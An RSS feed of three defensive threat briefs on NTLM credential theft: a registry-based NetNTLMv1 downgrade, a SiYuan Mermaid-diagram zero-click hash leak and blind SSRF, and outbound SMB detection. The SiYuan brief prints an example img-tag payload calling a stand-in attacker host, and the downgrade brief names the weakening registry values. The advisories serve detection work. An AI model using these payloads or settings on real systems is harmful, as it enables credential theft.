<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Ntlm — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/ntlm/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Mon, 04 May 2026 14:17:05 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/ntlm/feed.xml" rel="self" type="application/rss+xml"/><item><title>Potential NetNTLMv1 Downgrade Attack via Registry Modification</title><link>https://feed.craftedsignal.io/briefs/2026-05-netntlmv1-downgrade/</link><pubDate>Mon, 04 May 2026 14:17:05 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-netntlmv1-downgrade/</guid><description>This brief details a registry modification attack that downgrades the system to NTLMv1 authentication, enabling NetNTLMv1 downgrade attacks, typically performed with local administrator privileges on Windows systems.</description><content:encoded><![CDATA[<p>This rule detects a specific defense evasion technique where an attacker modifies the Windows registry to force a system to use the less secure NTLMv1 authentication protocol. This is known as a NetNTLMv1 downgrade attack. The registry modification involves changing the <code>LmCompatibilityLevel</code> value, which controls the authentication level. Attackers with local administrator privileges can perform this modification to weaken the authentication mechanism, making it easier to intercept and crack credentials. The rule is designed to detect this activity by monitoring registry events from various sources, including Elastic Defend, Microsoft Defender XDR, SentinelOne Cloud Funnel, Sysmon, and Crowdstrike. It is important to monitor for this activity as it can lead to credential theft and further compromise of the system.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains local administrator privileges on a Windows system.</li>
<li>The attacker uses a registry editor or command-line tool (e.g., <code>reg.exe</code>, PowerShell) to modify the <code>LmCompatibilityLevel</code> value in the registry.</li>
<li>The attacker navigates to one of the following registry paths: <code>HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel</code> or <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa</code>.</li>
<li>The attacker sets the <code>LmCompatibilityLevel</code> value to &ldquo;0&rdquo;, &ldquo;1&rdquo;, or &ldquo;2&rdquo; (or their hexadecimal equivalents &ldquo;0x00000000&rdquo;, &ldquo;0x00000001&rdquo;, &ldquo;0x00000002&rdquo;). These values force the system to use NTLMv1.</li>
<li>The system now uses NTLMv1 for authentication attempts.</li>
<li>The attacker initiates a man-in-the-middle attack to capture NTLMv1 authentication traffic using tools like Responder or Inveigh.</li>
<li>The captured NTLMv1 hashes are cracked using brute-force or dictionary attacks, revealing the user&rsquo;s credentials.</li>
<li>The attacker uses the compromised credentials to gain unauthorized access to network resources or other systems.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful NetNTLMv1 downgrade attack can lead to the compromise of user credentials, enabling attackers to move laterally within the network, access sensitive data, and potentially escalate privileges. The impact can range from data breaches to complete system compromise, depending on the attacker&rsquo;s objectives and the compromised user&rsquo;s privileges.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;Potential NetNTLMv1 Downgrade Attack&rdquo; to detect registry modifications setting <code>LmCompatibilityLevel</code> to insecure values (0, 1, 2) within the specified registry paths.</li>
<li>Enable Sysmon registry event logging to ensure the necessary data is available for the Sigma rule to function correctly.</li>
<li>Review registry event logs for unauthorized modifications of <code>LmCompatibilityLevel</code> to confirm legitimate administrative actions.</li>
<li>Implement strict access control policies to limit local administrator privileges and reduce the attack surface.</li>
<li>Monitor the references URL for updates on recommended security configurations related to NTLM authentication.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>defense-evasion</category><category>ntlm</category><category>registry-modification</category><category>windows</category></item><item><title>SiYuan Zero-Click NTLM Theft and Blind SSRF via Mermaid Diagrams</title><link>https://feed.craftedsignal.io/briefs/2026-04-siyuan-ntlm-ssrf/</link><pubDate>Sat, 11 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-siyuan-ntlm-ssrf/</guid><description>SiYuan is vulnerable to zero-click NTLM hash theft on Windows and blind SSRF on all platforms due to insecure Mermaid.js configuration, where a malicious Mermaid diagram containing a protocol-relative URL can be injected into a note, causing the Electron client to fetch the URL, triggering SMB authentication on Windows and sending the victim's NTLMv2 hash to the attacker. On macOS and Linux, the request acts as a tracking pixel and blind SSRF.</description><content:encoded><![CDATA[<p>SiYuan, a note-taking application, is vulnerable to a zero-click NTLM hash theft and blind SSRF exploit due to insecure configuration of Mermaid.js. The application configures Mermaid.js with <code>securityLevel: &quot;loose&quot;</code> and <code>htmlLabels: true</code>, which allows <code>&lt;img&gt;</code> tags with <code>src</code> attributes to bypass sanitization and be injected into SVG <code>&lt;foreignObject&gt;</code> blocks. When a user opens a note containing a malicious Mermaid diagram with a protocol-relative URL (e.g., <code>//attacker.com/image.png</code>), the Electron client fetches the URL. On Windows, this resolves as a UNC path, triggering SMB authentication and sending the victim&rsquo;s NTLMv2 hash to the attacker. On macOS and Linux, the same diagram triggers an HTTP request to the attacker&rsquo;s server, exfiltrating the victim&rsquo;s IP address. The vulnerability affects SiYuan versions prior to the fix implemented after April 7, 2026. This allows for credential theft without any user interaction beyond opening a note.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker crafts a malicious SiYuan note containing a Mermaid diagram with a protocol-relative URL within an <code>&lt;img&gt;</code> tag, such as <code>&lt;img src='//attacker.com/share/img.png'&gt;</code>.</li>
<li>The attacker distributes the malicious note (e.g., via sharing or a crafted .sy export).</li>
<li>The victim opens the note in SiYuan.</li>
<li>SiYuan renders the Mermaid diagram using the insecure Mermaid.js configuration.</li>
<li>The SVG containing the malicious <code>&lt;img&gt;</code> tag is injected into the DOM via <code>innerHTML</code>.</li>
<li>The Electron client attempts to fetch the resource at the protocol-relative URL.</li>
<li>On Windows, the protocol-relative URL resolves to a UNC path (<code>\\attacker.com\share\img.png</code>), initiating an SMB connection.</li>
<li>Windows automatically sends the victim&rsquo;s NTLMv2 hash to the attacker&rsquo;s SMB server, or makes an HTTP request leaking victim&rsquo;s IP on other platforms.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The vulnerability allows for zero-click NTLMv2 hash theft on Windows systems, where the victim only needs to open a note containing the malicious Mermaid diagram. The stolen NTLMv2 hashes can be cracked offline or used in relay attacks to gain unauthorized access to the victim&rsquo;s resources. On all platforms, this vulnerability can be exploited to perform blind SSRF and leak the victim&rsquo;s IP address, acting as a tracking pixel to confirm when the note was opened. This affects all SiYuan users who receive a crafted note.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Detect SiYuan Mermaid NTLM Theft Attempt</code> to identify SMB traffic originating from SiYuan processes attempting to connect to external IPs (network_connection log source).</li>
<li>Deploy the Sigma rule <code>Detect SiYuan Mermaid SSRF Attempt</code> to detect HTTP requests from SiYuan to external IP addresses with a suspicious URL (network_connection log source).</li>
<li>Monitor network traffic for SMB connections originating from SiYuan, especially to unusual or external destinations (network_connection log source).</li>
<li>Block the attacker&rsquo;s domain (<code>attacker.com</code>) at the DNS resolver, as observed in the malicious Mermaid diagram example (iocs).</li>
<li>Upgrade SiYuan to a patched version that addresses CVE-2026-40107 to mitigate the underlying vulnerability.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>siyuan</category><category>ntlm</category><category>ssrf</category><category>credential-theft</category><category>mermaid</category></item><item><title>Detecting Rare SMB Connections for Potential NTLM Credential Theft</title><link>https://feed.craftedsignal.io/briefs/2024-01-rare-smb-exfiltration/</link><pubDate>Thu, 25 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-rare-smb-exfiltration/</guid><description>This brief details a detection strategy for rare SMB connections originating from internal networks to the internet, potentially indicating NTLM credential theft via rogue UNC path injection.</description><content:encoded><![CDATA[<p>This detection strategy focuses on identifying unusual Server Message Block (SMB) traffic that originates from internal IP addresses and connects to external networks. The SMB protocol, commonly used for file and printer sharing within a network, can be exploited to exfiltrate data by injecting rogue UNC paths to capture NTLM credentials. This activity is often associated with threat actors attempting to steal credentials for lateral movement or data exfiltration. Defenders should be aware of this technique as it allows adversaries to bypass traditional security controls by leveraging a legitimate protocol for malicious purposes. This detection is relevant for environments utilizing Windows operating systems and SMB for internal network communications. The goal is to identify and alert on SMB connections to external IPs, excluding known safe ranges and legitimate business applications.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker compromises an internal system via phishing or other means (not detailed in source).</li>
<li>The attacker injects a rogue UNC path into a document, email, or other medium.</li>
<li>A user opens the malicious document or clicks the injected link, triggering an SMB connection to a malicious external server.</li>
<li>The SMB connection attempts to authenticate with the user&rsquo;s NTLM credentials.</li>
<li>The attacker captures the NTLM hash from the authentication attempt.</li>
<li>The attacker attempts to crack the NTLM hash to obtain the user&rsquo;s password.</li>
<li>Using the cracked password, the attacker gains unauthorized access to other systems and resources on the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation can lead to credential theft, allowing attackers to gain unauthorized access to sensitive data and systems within the organization. This can result in data breaches, financial losses, and reputational damage. The impact is significant because SMB is a common protocol within many Windows environments, making this technique highly effective if not properly monitored.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;Detect SMB Connection to External IP&rdquo; to your SIEM to identify potentially malicious SMB connections to the internet. Tune the rule by excluding known good external IPs used by legitimate services.</li>
<li>Enable Sysmon Event ID 3 (Network Connection) with proper filtering to capture SMB traffic details as recommended in the linked setup guide, to enhance the fidelity of the detection.</li>
<li>Implement network segmentation to restrict SMB traffic to only necessary internal communications, reducing the attack surface and mitigating the risk of external exposure.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>exfiltration</category><category>credential-access</category><category>windows</category><category>smb</category><category>ntlm</category></item></channel></rss>